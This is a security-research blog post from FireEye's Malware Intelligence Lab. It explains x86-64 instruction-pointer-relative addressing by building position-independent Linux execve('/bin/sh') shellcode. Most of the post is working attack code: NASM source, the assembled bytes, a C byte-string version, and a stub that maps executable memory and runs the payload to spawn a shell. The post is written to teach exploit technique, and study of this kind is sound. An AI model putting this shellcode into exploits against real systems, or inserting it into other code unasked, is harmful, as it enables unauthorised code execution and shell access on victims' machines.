Jump to content

FireEye Malware

Intelligence Lab

Threat research, analysis, and mitigation

Main | Next Post ยป

Instruction Pointer Relative Addressing (for position independent code)

So, here's an interesting trick I've been using, that I've never seen anyone mention before. One of the new features that AMD added to the x86 instruction set when they did the AMD64/x86-64, was that in "long mode" (64-bit mode), the encoding for the old 32-bit immediate offset addressing mode, is now a 32-bit offset from the current RIP, not from 0x00000000 like before. In English, this means that you don't have to know the absolute address of something you want to reference, you only need to know how far away it is from the currently executing instruction [technically the next instruction].

So, let's say you're writing a fairly generic execve() shellcode. I'm going to assume that everyone here has read Aleph One's paper on this, so I'm not going to repeat that here. (Gripe: What is it with all these shellcode tutorials, that are just slightly rewritten copies of "Smashing the Stack…"?)

This is what we want to do:


execve() example in C

#include <stdio.h>

int main() {
    char *name[2];

 asm("nop");

    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);

 asm("nop");

    return 0;
}

I just put the NOP's in there to make things easier to spot below.

gdb spewage

gcc -static -g -o example example.c
gdb example
[spew]
*(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400284 <main+0>:    push   %rbp
0x0000000000400285 <main+1>:    mov    %rsp,%rbp
0x0000000000400288 <main+4>:    sub    $0x10,%rsp
0x000000000040028c <main+8>:    nop
0x000000000040028d <main+9>:    movq   $0x451ce4,0xfffffffffffffff0(%rbp)
0x0000000000400295 <main+17>:   movq   $0x0,0xfffffffffffffff8(%rbp)
0x000000000040029d <main+25>:   lea    0xfffffffffffffff0(%rbp),%rsi
0x00000000004002a1 <main+29>:   mov    0xfffffffffffffff0(%rbp),%rdi
0x00000000004002a5 <main+33>:   mov    $0x0,%edx
0x00000000004002aa <main+38>:   mov    $0x0,%eax
0x00000000004002af <main+43>:   callq  0x406740 <execve>
0x00000000004002b4 <main+48>:   nop
0x00000000004002b5 <main+49>:   mov    $0x0,%eax
0x00000000004002ba <main+54>:   leaveq
0x00000000004002bb <main+55>:   retq
End of assembler dump.
*(gdb) disassemble execve
Dump of assembler code for function execve:
0x0000000000406740 <execve+0>:  mov    $0x0,%eax
0x0000000000406745 <execve+5>:  mov    %rbx,0xffffffffffffffe8(%rsp)
0x000000000040674a <execve+10>: mov    %rbp,0xfffffffffffffff0(%rsp)
0x000000000040674f <execve+15>: mov    %r12,0xfffffffffffffff8(%rsp)
0x0000000000406754 <execve+20>: sub    $0x18,%rsp
0x0000000000406758 <execve+24>: test   %rax,%rax
0x000000000040675b <execve+27>: mov    %rdi,%r12
0x000000000040675e <execve+30>: mov    %rsi,%rbp
0x0000000000406761 <execve+33>: mov    %rdx,%rbx
0x0000000000406764 <execve+36>: je     0x40676b <execve+43>
0x0000000000406766 <execve+38>: callq  0x0
0x000000000040676b <execve+43>: mov    %rbx,%rdx
0x000000000040676e <execve+46>: mov    %rbp,%rsi
0x0000000000406771 <execve+49>: mov    %r12,%rdi
0x0000000000406774 <execve+52>: mov    $0x3b,%eax
0x0000000000406779 <execve+57>: syscall
You can ignore the rest of this...
0x000000000040677b <execve+59>: cmp    $0xfffffffffffff000,%rax
0x0000000000406781 <execve+65>: mov    %rax,%rbx
0x0000000000406784 <execve+68>: ja     0x40679b <execve+91>
0x0000000000406786 <execve+70>: mov    %ebx,%eax
0x0000000000406788 <execve+72>: mov    0x8(%rsp),%rbp
0x000000000040678d <execve+77>: mov    (%rsp),%rbx
0x0000000000406791 <execve+81>: mov    0x10(%rsp),%r12
0x0000000000406796 <execve+86>: add    $0x18,%rsp
0x000000000040679a <execve+90>: retq
0x000000000040679b <execve+91>: callq  0x400950 <__errno_location>
0x00000000004067a0 <execve+96>: mov    %ebx,%edx
0x00000000004067a2 <execve+98>: mov    $0xffffffffffffffff,%rbx
0x00000000004067a9 <execve+105>:        neg    %edx
0x00000000004067ab <execve+107>:        mov    %edx,(%rax)
0x00000000004067ad <execve+109>:        jmp    0x406786 <execve+70>
0x00000000004067af <execve+111>:        nop
End of assembler dump.
*(gdb) x/s 0x451ce4
0x451ce4 <_IO_stdin_used+4>:     "/bin/sh"

For lack of being able to easily draw arrows in flat HTML, I'm just coloring the important parts. As you can see, argument 1, the pointer to "/bin/sh" is in RDI, argument 2, the pointer to the pointer to "/bin/sh", followed by NULL, is in RSI, and argument 3, RDX, is NULL. 0x3B (59.) is the syscall number for execve.

We could have also just looked in /usr/linux/include/asm/unistd.h for the calling convention.

Excerpt from unistd.h

#define __NR_execve                             59
__SYSCALL(__NR_execve, stub_execve)
[...]
#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile (__syscall \
        : "=a" (__res) \
        : "0" (__NR_##name),"D" ((long)(arg1)),"S" ((long)(arg2)), \
                  "d" ((long)(arg3)) : __syscall_clobber); \
__syscall_return(type,__res); \
}

So, all we have to do, is have a "/bin/sh" string somewhere in memory, and a pointer to that somewhere else, followed by a NULL; Where ever our shellcode got written to is as good a place as any, but how do we know where we're executing from? On IA-32, there are only two really easy ways to get your current EIP, by making a CALL foo — which is like doing a PUSH EIP ; JMP foo, or by executing a floating point instruction, and dumping the x87 status registers out into memory with FSTENV — historically, the FPU was a completely separate chip, and would do its own exception handling, and stuff.

In Aleph One's original paper he did this trick:

     JMP foo
bar: POP ESI
     <rest of shellcode>
foo: CALL bar
.string "/bin/sh"
Which gives you, in ESI, the address of that "/bin/sh" at the end of your shellcode. Most of the Pex decoders in the Metasploit Framework use FSTENV to write all the FPU registers out onto the stack, about 12 bytes below the current ESP in fact, which leaves the third DWORD, the EIP, at the top, which can then just be POP'ed off.

On x86-64, it is much easier to find you current RIP, just do this:

LEA EAX, [RIP]

And EAX will contain the address of the next instruction.

blah blah blah…

So, I was going to write a long narrative here, about how to write shellcode, and remove nulls, and use shorter instruction encodings and stuff. But I was just distracted, and lost my train of thought. So if there's anything here you don't understand, just ask. By doing [RIP-7] rather than just [RIP], you avoid having a 0x00000000 immediate value. Everything else should be self-explanatory. I'm writing the argv array just past the end of the "/bin/sh" string.


Shellcode

%define arg1      RDI
%define arg2      RSI
%define arg3      RDX
%define arg3_lowb DL
%define sys_nr    AL
%define nr_execve 0x3B

BITS 64
   LEA        arg1, [RIP-here]            ; runtime address of *this* LEA instruction,
                                          ; removes 00000000's (always encode with 32-bit
                                          ; immediate)

                                          ; todo: could just push string onto stack (as 
                                          ; immediate value)
here:
   ADD        arg1, BYTE bin_sh           ; offset of "/bin/sh" in code below

   XOR                    arg3, arg3      ; execve(..., ..., NULL);
   MOV       [arg1+null_byte ], arg3_lowb ; write a '\0' to end of string, just in case
   MOV       [arg1+null_point], arg3      ; name[1] = NULL;
   MOV       [arg1+name_array], arg1      ; name[0] = address to "/bin/sh" in
                                          ;           execve("/bin/sh", ..., ...);
   LEA arg2, [arg1+name_array]            ; execve(..., name, ...);
   MOV sys_nr, nr_execve                  ; Syscall 59 execve()
   SYSCALL                                ; or INT 0x80
bin_sh:
     db "/bin/sh";
     null_byte  equ $-bin_sh
     name_array equ null_byte +1
     null_point equ name_array+8

The shellcode binary ends up looking like this:

Shellcode Bytes

488D3DF9FFFFFF          LEA RDI, [RIP-here]
4883C721                ADD RDI, BYTE bin_sh
4831D2                  XOR RDX, RDX
885707                  MOV [RDI+null_byte ], DL
48895710                MOV [RDI+null_point], RDX
48897F08                MOV [RDI+name_array], RDI
488D7708                LEA RSI, [RDI+name_array]
B03B                    MOV AL, 0x3B
0F05                    SYSCALL
2F62696E2F7368          db "/bin/sh"

To quickly test this out, because Gentoo Linux X86_64 will set memory pages to be either writable [X]OR executable, but not both at once, and non-exec actually works on AMD64, I'm just mmaping a page of anonymous memory, writing the shellcode into there, and then running it. This is a lot faster than writing a real exploit. (Which would involve building my own stackframes to make return-to-lib-c calls, to call mprotect and stuff, blah blah.)

memory map

$ cat /proc/16874/maps

00400000-00471000 r-xp 00000000 fd:05 4853              /home/jwolf/duh
00571000-00573000 rw-p 00071000 fd:05 4853              /home/jwolf/duh
00573000-00596000 rw-p 00573000 00:00 0                 [heap]
2b429e3da000-2b429e3db000 rwxs 00000000 00:07 326570    /dev/zero (deleted)
this is the mmaped'd page
7fffff7f6000-7fffff80c000 rw-p 7fffff7f6000 00:00 0     [stack]
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vdso]

Cut and paste the spew from this, into the shellcode[], below:

yasm -l shellcode.log -L nasm shellcode.yasm && hexdump -v -e '1/1 "Qx%02x"' shellcode \
|tr "Q" \\\\ ; echo ; ls -l shellcode

Small code stub in C

#include<sys/mman.h>

// TODO: just mmap the binary file the assembler spit out.
char shellcode[] = "\x48\x8d\x3d\xf9\xff\xff\xff\x48\x83\xc7\x21\x48\x31\xd2\x88\x57\x07\x48\x89\x57\x10\x48\x89\x7f\x08\x48\x8d\x77\x08\xb0\x3b\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68";
int length = 40;

int main() {

  void (*exec_mem)() = mmap (0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, \
                                      MAP_SHARED|MAP_ANONYMOUS, 0, 0);
  memcpy(exec_mem, shellcode, length);

  asm("break: nop");

  exec_mem();

}

Build with something like:

gcc -g -o stub stub.c

then ./stub
sh-3.00$

or if you were root at the time:
sh-3.00#

ta-da.

Debugging notes

If you need to debug this because you got a segfault, then that's a long long topic that I don't feel like writing about right now. I usually start off with:

gdb stub |tee -a gdb_spew.log

and then…

           break break
           display/i $rip
           r
           stepi

and then do "info reg" and "x/8xg" stuff as needed.

Postscript:

Has anyone else noticed that when running in 32-bit compatibility mode on AMD64 Linux, that:

  1. gbd is just plain broken (wrong values in registers, etc.)
  2. The registers, for the second argument for a syscall, change, randomly, between EBX and EBP when you're using INT 0x80 vs SYSCALL. (CD80 vs. 0F05)



Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835018afd53ef00e551fe4b7b8834

Listed below are links to weblogs that reference Instruction Pointer Relative Addressing (for position independent code):

Recent Comments

Feed You can follow this conversation by subscribing to the comment feed for this post.

The comments to this entry are closed.